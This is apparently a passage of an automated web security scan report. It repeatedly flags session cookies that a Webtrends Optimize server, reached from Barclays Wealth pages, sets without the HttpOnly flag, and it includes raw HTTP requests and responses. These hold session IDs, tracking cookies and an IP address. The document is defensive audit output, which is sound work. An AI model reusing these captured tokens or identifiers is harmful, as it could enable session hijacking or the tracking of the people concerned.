b3c9704495fd8e00d09ae35151442e17656a1754a31f2341d244709ba12cd69cc09e6b8eaa82a44a9e2c6c79f1cd33eb86eac041b89f90b084540fa130020e282ab85c86753c598e32be61a40ad115bb28fcb4cd9fc46c23f1e4b9c1de4dc5267d19ca38906d6afa60b6c335ed48259fe13cb297adf517a2aced63bcbecada3ed3a960df96629a50e58ae4c0178e7faa122406abe04d14b39d016e8e31aa84f99e4056bf4a35df87926ba4dd1a21ffd079714c50820e47d59b96dd659972566a8b031da0bb35df2617b373c19c5b4dde4ce3d69ccf6b59e8f90f2daf9b6156f1bb0cb98c78d0b4013d2173f1dd657de090d2027d750c94eaba1b0f554b23b5f05b5697157327f95360a35612ea4ec297f9766254e3715123d07c3c51ecacef5e222e1577edc72b13c16462e6befedeb66510d1111be7d80eb92aa438a4b029d892513ab41961f5aaf75ffce04cba025fc8cef680e1b66e970a5ab467d6a0d739e976c1f1d8a6dcba5f531f390f0f45e8967f71504700f2f889714595c5206e8e7491a5ad7e78b470e10e6bcb41b8301b41916d59fbb90e135577f1fe619942105793ef90cb82ecc80fa98596434f90d984edad0e5bd92722b197e67b3dd1fc9400cb7ea8654a0caf6248f87bacf297959af756d6072084056728133a669b77bfb470469769929c57142930d428d71771d3ae20022915c185680ddc652f917d0a04aa3b486f8a8280dad7ba48ff12e8423635d8cab094b976b070de61e102984f643f4fdb6ad17c406685c8a45069b2596d3a392fdc3276be3e84c1bcfce2985a91d9122f2d85c3a3f2c4ab82b95f9f7d62dbd2a3b324d1367971b1c1d198290c0e13b3777d2cf1156886c40b883d47b346180747440a6ac8591f61c72c18126c0d7d523617b5682bd58b743da7996af1aa4f24f9711fffb97a38155f734a1c2c18adb19acdc17ee66be2cd9ca7136ed44b29c1ed843ae62e6e151e0e6354189bb7611e37d4dcaf9872fa7568551bb31337ddd8563f91a6500ac2e9d1af9accbc502a7f64a  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504096ebad4514097d6ea42a2aaa1722bfc6805023920a5cea144572e6e343d86b5428cb628720722ed8417529f7043e24af651d3065232800df809d929d406c381026ac30bf2057f84424832564b636da827f53a737cae48fbbbe7f343a9f53a45e1c472f42eeaa81b1753d9efa4be878149ec767699c605dcc25a776c1875b6ac5cd69b5d929e46a8b4d2acd3192124d25b3c9704495fd8e00d09ae35151442e17656a1754a31f2341d244709ba12cd69cc09e6b8eaa82a44a9e2c6c79f1cd33eb86eac041b89f90b084540fa130020e282ab85c86753c598e32be61a40ad115bb28fcb4cd9fc46c23f1e4b9c1de4dc5267d19ca38906d6afa60b6c335ed48259fe13cb297adf517a2aced63bcbecada3ed3a960df96629a50e58ae4c0178e7faa122406abe04d14b39d016e8e31aa84f99e4056bf4a35df87926ba4dd1a21ffd079714c50820e47d59b96dd659972566a8b031da0bb35df2617b373c19c5b4dde4ce3d69ccf6b59e8f90f2daf9b6156f1bb0cb98c78d0b4013d2173f1dd657de090d2027d750c94eaba1b0f554b23b5f05b5697157327f95360a35612ea4ec297f9766254e3715123d07c3c51ecacef5e222e1577edc72b13c16462e6befedeb66510d1111be7d80eb92aa438a4b029d892513ab41961f5aaf75ffce04cba025fc8cef680e1b66e970a5ab467d6a0d739e976c1f1d8a6dcba5f531f390f0f45e8967f71504700f2f889714595c5206e8e7491a5ad7e78b470e10e6bcb41b8301b41916d59fbb90e135577f1fe619942105793ef90cb82ecc80fa98596434f90d984edad0e5bd92722b197e67b3dd1fc9400cb7ea8654a0caf6248f87bacf297959af756d6072084056728133a669b77bfb470469769929c57142930d428d71771d3ae20022915c185680ddc652f917d0a04aa3b486f8a8280dad7ba48ff12e8423635d8cab094b976b070de61e102984f643f4fdb6ad17c406685c8a45069b2596d3a392fdc3276be3e84c1bcfce2985a91d9122f2d85c3a3f2c4ab82b95f9f7d62dbd2a3b324d1367971b1c1d198290c0e13b3777d2cf1156886c40b883d47b346180747440a6ac8591f61c72c18126c0d7d523617b5682bd58b743da7996af1aa4f24f9711fffb97a38155f734a1c2c18adb19acdc17ee66be2cd9ca7136ed44b29c1ed843ae62e6e151e0e6354189bb7611e37d4dcaf9872fa7568551bb31337ddd8563f91a6500ac2e9d1af9accbc502a7f64a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d504096ebad4514097d6ea42a2aaa1722bfc6805023920a5cea144572e6e343d86b5428cb628720722ed8417529f7043e24af651d3065232800df809d929d406c381026ac30bf2057f84424832564b636da827f53a737cae48fbbbe7f343a9f53a45e1c472f42eeaa81b1753d9efa4be878149ec767699c605dcc25a776c1875b6ac5cd69b5d929e46a8b4d2acd3192124d25b3c9704495fd8e00d09ae35151442e17656a1754a31f2341d244709ba12cd69cc09e6b8eaa82a44a9e2c6c79f1cd33eb86eac041b89f90b084540fa130020e282ab85c86753c598e32be61a40ad115bb28fcb4cd9fc46c23f1e4b9c1de4dc5267d19ca38906d6afa60b6c335ed48259fe13cb297adf517a2aced63bcbecada3ed3a960df96629a50e58ae4c0178e7faa122406abe04d14b39d016e8e31aa84f99e4056bf4a35df87926ba4dd1a21ffd079714c50820e47d59b96dd659972566a8b031da0bb35df2617b373c19c5b4dde4ce3d69ccf6b59e8f90f2daf9b6156f1bb0cb98c78d0b4013d2173f1dd657de090d2027d750c94eaba1b0f554b23b5f05b5697157327f95360a35612ea4ec297f9766254e3715123d07c3c51ecacef5e222e1577edc72b13c16462e6befedeb66510d1111be7d80eb92aa438a4b029d892513ab41961f5aaf75ffce04cba025fc8cef680e1b66e970a5ab467d6a0d739e976c1f1d8a6dcba5f531f390f0f45e8967f71504700f2f889714595c5206e8e7491a5ad7e78b470e10e6bcb41b8301b41916d59fbb90e135577f1fe619942105793ef90cb82ecc80fa98596434f90d984edad0e5bd92722b197e67b3dd1fc9400cb7ea8654a0caf6248f87bacf297959af756d6072084056728133a669b77bfb470469769929c57142930d428d71771d3ae20022915c185680ddc652f917d0a04aa3b486f8a8280dad7ba48ff12e8423635d8cab094b976b070de61e102984f643f4fdb6ad17c406685c8a45069b2596d3a392fdc3276be3e84c1bcfce2985a91d9122f2d85c3a3f2c4ab82b95f9f7d62dbd2a3b324d1367971b1c1d198290c0e13b3777d2cf1156886c40b883d47b346180747440a6ac8591f61c72c18126c0d7d523617b5682bd58b743da7996af1aa4f24f9711fffb97a38155f734a1c2c18adb19acdc17ee66be2cd9ca7136ed44b29c1ed843ae62e6e151e0e6354189bb7611e37d4dcaf9872fa7568551bb31337ddd8563f91a6500ac2e9d1af9accbc502a7f64a HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A41F4D7EB85977B26917F3C61E7ED309; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=fcdcc722e932031ed775

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D04074B23F5A36B7B29BA0731F53ABEE; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.41. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa86794b447cd72f4910f653f7f41ff26d6f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa86794b447cd72f4910f653f7f41ff26d6f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa86794b447cd72f4910f653f7f41ff26d6f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6EDFD59FF31DFFC88DA19690B7FF95B4; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d016e163d; _wt.mode-79569=fcdcc722e93203b7c335

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:29:50 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=59A67E9E4A42771D4AE9AAE699FFE647; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.42. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b1244870c1f77575f813e1f6f603fbaf73501f56803  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b1244870c1f77575f813e1f6f603fbaf73501f56803

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b1244870c1f77575f813e1f6f603fbaf73501f56803 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D8093C1321BCE6A1782156CDD8E84722; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
